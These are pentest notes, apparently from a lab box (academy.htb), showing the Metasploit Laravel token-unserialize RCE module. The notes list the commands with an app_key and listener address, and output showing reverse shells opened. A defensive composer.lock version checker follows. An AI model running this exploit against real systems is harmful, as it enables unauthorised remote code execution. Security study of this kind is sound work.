Laravel

PHP Laravel Framework 5.5.40 / 5.6.x < 5.6.30 - token Unserialize Remote Command Execution (Metasploit)

This module applies if you somehow find the app_key and Laravel is running any of the vulnerable versions.

msf6 > use exploit/unix/http/laravel_token_unserialize_exec
msf6 exploit(unix/http/laravel_token_unserialize_exec) > set rhosts academy.htb
msf6 exploit(unix/http/laravel_token_unserialize_exec) > set vhost dev-staging-01.academy.htb
msf6 exploit(unix/http/laravel_token_unserialize_exec) > set app_key dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
msf6 exploit(unix/http/laravel_token_unserialize_exec) > set lhost 10.10.14.3
msf6 exploit(unix/http/laravel_token_unserialize_exec) > run

[*] Started reverse TCP handler on 10.10.14.3:4444
[*] Command shell session 1 opened (10.10.14.3:4444 -> 10.10.10.215:51084) at 2020-12-07 12:47:57 +0100
[*] Command shell session 2 opened (10.10.14.3:4444 -> 10.10.10.215:51086) at 2020-12-07 12:47:58 +0100

whoami
www-data
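
From the defending side, the version precondition can be checked against a project's composer.lock. This is an added example, not part of the original notes or of Metasploit. It assumes the module title's "5.5.40" is an upper bound, so everything up to 5.5.40 is flagged, and the lock-file contents are constructed samples.

```python
import json
import re

# Ranges read from the module title on this page. Assumption: "5.5.40" is an
# upper bound, so every release up to and including 5.5.40 is flagged.
MAX_OLD_BRANCH = (5, 5, 40)
RANGE_5_6 = ((5, 6, 0), (5, 6, 29))   # "5.6.x < 5.6.30"

def parse_version(text):
    """Turn 'v5.6.29' or '5.5.40' into (5, 6, 29); None if not x.y.z."""
    m = re.fullmatch(r"v?(\d+)\.(\d+)\.(\d+)", text.strip())
    return tuple(int(p) for p in m.groups()) if m else None

def laravel_version(lock_text):
    """Return the locked laravel/framework version string, or None."""
    lock = json.loads(lock_text)
    for pkg in lock.get("packages", []) + lock.get("packages-dev", []):
        if pkg.get("name") == "laravel/framework":
            return pkg.get("version")
    return None

def audit(lock_text):
    """Classify a composer.lock: affected, not-affected, unknown or absent."""
    raw = laravel_version(lock_text)
    if raw is None:
        return "absent"
    ver = parse_version(raw)
    if ver is None:   # e.g. 'dev-master': not comparable, review by hand
        return "unknown"
    lo, hi = RANGE_5_6
    hit = ver <= MAX_OLD_BRANCH or lo <= ver <= hi
    return "affected" if hit else "not-affected"

def make_lock(version):
    """Constructed sample composer.lock content for the demo below."""
    return json.dumps({"packages": [
        {"name": "symfony/console", "version": "v4.1.3"},
        {"name": "laravel/framework", "version": version},
    ]})

if __name__ == "__main__":
    for v in ["v5.5.40", "v5.6.29", "v5.6.30", "dev-master"]:
        print(v, "->", audit(make_lock(v)))
```

An "affected" result covers only the version half of the precondition; the other half is the app_key, so a key that may have been exposed should also be regenerated.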
